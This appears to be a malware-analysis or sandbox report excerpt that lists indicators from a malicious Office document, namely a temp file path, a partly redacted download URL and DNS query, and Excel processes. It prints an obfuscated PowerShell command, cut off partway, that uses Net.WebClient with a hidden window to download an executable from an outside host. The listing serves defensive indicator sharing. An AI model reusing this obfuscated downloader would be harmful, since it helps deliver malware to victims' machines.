Technical Information
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.word\~wrf{24d2a627-a04d-43e8-b999-05301f52c28a}.tmp
- http://of######rchive-input.com/SystemHD.exe
- DNS ASK of######rchive-input.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' '(&'+'(G'+'C'+'^^^'.replace('^^^','M')+' *W-'+'O*)'+ 'Ne'+'t.'+'W'+'eb'+'C'+'li'+'ent)'+'.D'+'ow'+'nl'+'oa'+'d'+'F'+'il'+'e(''http://of######rchive-input.com/SystemHD.exe'',$env:APPDATA+''\Syst...' (with hidden window)
- '%ProgramFiles%\microsoft office\office14\excel.exe' -Embedding
- '%ProgramFiles%\microsoft office\office14\excelcnv.exe' -Embedding